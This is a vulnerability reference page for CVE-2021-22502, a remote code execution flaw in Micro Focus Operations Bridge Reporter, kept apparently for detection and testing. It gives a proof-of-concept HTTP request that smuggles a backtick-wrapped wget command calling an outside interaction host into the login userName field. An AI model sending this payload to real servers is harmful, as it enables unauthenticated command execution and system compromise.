🔙 목록으로 돌아가기

CVE-2021-22502: Micro Focus Operations Bridge Reporter - Remote Code Execution

TitleMicro Focus Operations Bridge Reporter - Remote Code Execution
Authorpikpikcu
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary commands on the Operations Bridge Reporter server, leading to complete system compromise and access to all monitoring data.
RemediationApply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.93981
CVE IDCVE-2021-22502
CWE IDCWE-78
Tags cve2021 cve microfocus obr rce kev vkev vuln

🔍 Vulnerability Description

Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.

🌐 HTTP Request

POST /AdminService/urest/v1/LogonResource HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 98
Content-Type: application/json
Accept-Encoding: gzip

{"userName":"something `wget d5jn7uple0o3d20vbqnghwpq47nauhrya.oast.fun`","credential":"whatever"}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-22502.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-22502.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A